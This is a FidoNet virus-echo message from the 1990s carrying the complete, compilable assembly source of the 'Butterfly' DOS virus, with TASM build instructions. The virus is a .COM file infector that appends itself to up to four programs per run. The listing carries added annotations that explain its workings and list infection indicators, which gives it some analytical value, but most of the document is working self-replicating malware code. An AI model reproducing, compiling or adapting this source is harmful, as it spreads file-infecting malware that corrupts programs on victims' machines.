;-- PVT.VIRII (2:465/65.4) ------------------------------------------------ PVT.VIRII --
; Msg : 51 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : BUTTRFLY.ASM
;----------------------------------------------------------------------------------------
;.RealName: Max Ivanov
;----------------------------------------------------------------------------------------
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: <20><><EFBFBD><EFBFBD>p<EFBFBD><70><EFBFBD><EFBFBD><EFBFBD> <20> <20><>p<EFBFBD><70><EFBFBD><EFBFBD>)
;* From : Hans Schotel, 2:283/718 (06 Nov 94 17:56)
;* To : Fred Lee
;* Subj : BUTTRFLY.ASM
;----------------------------------------------------------------------------------------
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f718.n283!not-for-mail
;@RFC-Return-Receipt-To: Hans.Schotel@f718.n283.z2.fidonet.org
Comment|
************************************************************************
Virus Name: Butterfly Virus
Effective Length: 302 bytes
Disassembled by Silent Death - 1993
Notes:
- Non-Resident .COM appender
- infects up to 4 files in the current directory
- infected files have 01h as the 4th byte
- OK virus to learn from, but a lot of wasteful code
To Compile: [Byte matchup!]
TASM /m File.asm
TLINK /t FILE.obj
************************************************************************|
;-----------------------------------------------------------------------
; Butterfly -- annotated listing (analysis notes only; code untouched).
; Target:   16-bit DOS .COM, TASM/MASM syntax (.model tiny, org 100h).
; Layout:   100h..107h is an 8-byte stub: a 2-byte jmp plus two nops,
;           then the 4 bytes (oldjmp,newjmp,90h,id) that get written over
;           a victim's first 4 bytes.  Everything from `virus` to the end
;           of the file is the body that is appended to victims.
; Registers (whole program):
;   bp = delta: run-time offset of `delta` minus its assembled offset
;        10Bh, so [bp+label] addresses a label wherever the body was
;        loaded.  Zero in the original, non-zero inside an infected host.
;   bx = open file handle, 0 = none (closeup relies on this).
;   si -> filename field of the DTA (dta+1Eh).
; Indicators an analyst can take from this listing:
;   - 4th byte of an infected .COM is 01h (`id`);
;   - 0FFh-delimited text 'Goddamn Butterflies' inside the body;
;   - the host's original 4 bytes plus 12Ah (298) bytes of body are
;     appended: 302 bytes, matching the "Effective Length" above;
;   - only '*.COM' in the current directory, at most 4 files per run;
;   - skips names whose 6th/7th characters are "ND" (COMMAND.COM),
;     files whose size low word is < 121, and files whose end offset
;     low word is > 64768.
;-----------------------------------------------------------------------
.model tiny
.code
org 100h
start:
jmp virus ; assembled as a 2-byte short jump; with the two nops this keeps
nop       ; `virus` at 108h and `delta` at 10Bh -- the hard-coded 10Bh
nop       ; below assumes exactly this encoding ("Byte matchup" above)
oldjmp db 0cdh ; int 20h   -- in the original these 4 bytes are CD 20 90 01;
newjmp db 20h  ;              in an infected host they hold the victim's
db 90h ; nop   ;              original first 4 bytes (saved before the body)
id db 1 ; infection marker: becomes the 4th byte of every infected file
virus:
call delta ; push the run-time address of `delta` ...
delta:
pop bp ; ... and pop it: bp = where `delta` actually is
sub bp,10Bh ; minus its assembled offset => bp = relocation delta
; --- restore the host's first 4 bytes at 100h from the saved copy ------
mov di,100h ; destination: start of the program image
lea si,[bp+oldjmp] ; source: the 4 saved bytes (oldjmp,newjmp,90h,id)
mov cx,4 ; move four bytes
cld ; clear direction flag
rep movsb ; move the bytes
; --- point the DTA into the body so FindFirst/FindNext fill `dta` ------
mov ah,1Ah ; set dta
lea dx,[bp+dta] ; set into heap
int 21h
mov byte ptr [bp+offset counter],0 ; reset counter
mov ah,4Eh ; find first asciiz file
lea si,[bp+dta+1eh] ; points to fname in dta
lea dx,[bp+fspec] ; files to find (*.COM)
push dx ; save file spec (findfiles re-reads it with pop/push)
jmp short findfiles
; --- exit: hand control to the restored host bytes at 100h --------------
returntohost:
mov ah,1Ah ; set dta
mov dx,80h ; to original position (PSP default DTA)
int 21h
xor ax,ax ; clear all registers
xor bx,bx ; no real need to
xor cx,cx
xor dx,dx
xor si,si
xor di,di
mov sp,0FFFEh ; adjust stack pointer
mov bp,100h ; return to here
push bp
xor bp,bp ; clear this
retn ; return to host (pops 100h into ip)
; --- closeup: restore the timestamp, close the current file, continue
;     the search.  Entered with bx = handle, or 0 when nothing is open ---
closeup:
or bx,bx ; is handle 0?
jz findnext ; yup so don't bother closing
mov ch,0 ; get attributes -- dead: cx is overwritten two lines below
mov cl,[bp+dta+15h] ; theres no point!
mov ax,5701h ; set files date/time back to the values FindFirst reported
mov cx,word ptr [bp+dta+16h]; get original time
mov dx,word ptr [bp+dta+18h]; get original date
int 21h
mov ah,3Eh ; close file
int 21h
xor bx,bx ; delete handle
findnext:
mov ah,4Fh ; find next file
findfiles:
pop dx ; get filespec
push dx
mov cx,7 ; all attributes (read-only | hidden | system)
xor bx,bx ; make sure no handle
int 21h
jnc infect ; jump if file found
jmp returntohost2 ; no files found then quit
; --- text embedded between two code paths; never executed --------------
vname db 0FFh
db 'Goddamn Butterflies' ; YA Know!
db 0FFh
; --- infect: one candidate per pass, si -> its name inside the DTA -----
infect:
mov dx,si ; dx => fname in dta
mov ax,3D02h ; open file read/write
int 21h
jc closeup ; if error close up, get another (bx is still 0)
mov bx,ax ; handle to bx
mov ah,3Fh ; read from file
mov cx,4 ; four bytes
lea dx,[bp+oldjmp] ; save here (the victim's original first 4 bytes)
int 21h
mov ax,word ptr [bp+dta+23h]; 6th/7th chars of the name (dta+1Eh+5)
cmp ax,444Eh ; is file command.com? ("ND" as in COMMAND.COM)
je closeup ; yup so leave it
cmp [bp+id],1 ; is file infected? (4th byte just read == 01h)
je closeup ; yup so leave it
mov ax,word ptr [bp+dta+1ah]; get file size (low word only)
cmp ax,121 ; is file smaller than 121?
jb closeup ; if it is leave it
mov ax,4202h ; file pointer to end
cwd
xor cx,cx
int 21h
cmp ax,64768 ; is file to big to infect (only the low word of dx:ax is checked)
ja closeup ; if above then jump
mov [bp+data],ax ; save file size
lea dx,[bp+oldjmp] ; buffer to write from
mov cx,4 ; 4 bytes
mov ah,40h ; write oldjmp to end of file
int 21h
lea dx,[bp+virus] ; start of virus
mov cx,12Ah ; write virus (298) to end
mov ah,40h ; write to file
int 21h
mov ax,4200h ; file pointer to start
cwd
xor cx,cx
int 21h
mov ax,[bp+data] ; get the file size
inc ax ; increment the file size
mov word ptr [bp+newjmp],ax ; save the new jump (word write also covers the 90h byte)
mov [bp+oldjmp],0E9h ; new jump
mov [bp+id],1 ; infection marker
lea dx,[bp+oldjmp] ; new jump
mov ah,40h ; write new start
mov cx,4 ; four bytes
int 21h
inc [bp+counter]
cmp [bp+counter],4 ; has 4 files been infected?
jae returntohost3 ; yup so return to host
jmp closeup ; close current file
returntohost2: ; This is a total waste!
mov di,100h ; start of file
cmp word ptr [di],20CDh ; are we the original
je returntohost3 ; yup -- both outcomes fall into returntohost3 anyway
returntohost3:
jmp returntohost
; --- data; all of it lies inside the appended body ---------------------
fspec db '*.COM',0 ; files to find
dta db 43 dup (0) ; holds dta
counter db 0 ; holds file counter
data dw 0 ; holds new jump offset
end start
;-+- Concord/QWK O.O1 Beta-7
; + Origin: Data Fellows BBS (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
;   The MeteO
;
;/L Specify library search paths
;
;--- Aidstest Null: /Kill
; * Origin: <20>PVT.ViRII<49>main<69>board<72> / Virus Research labs. (2:5030/136)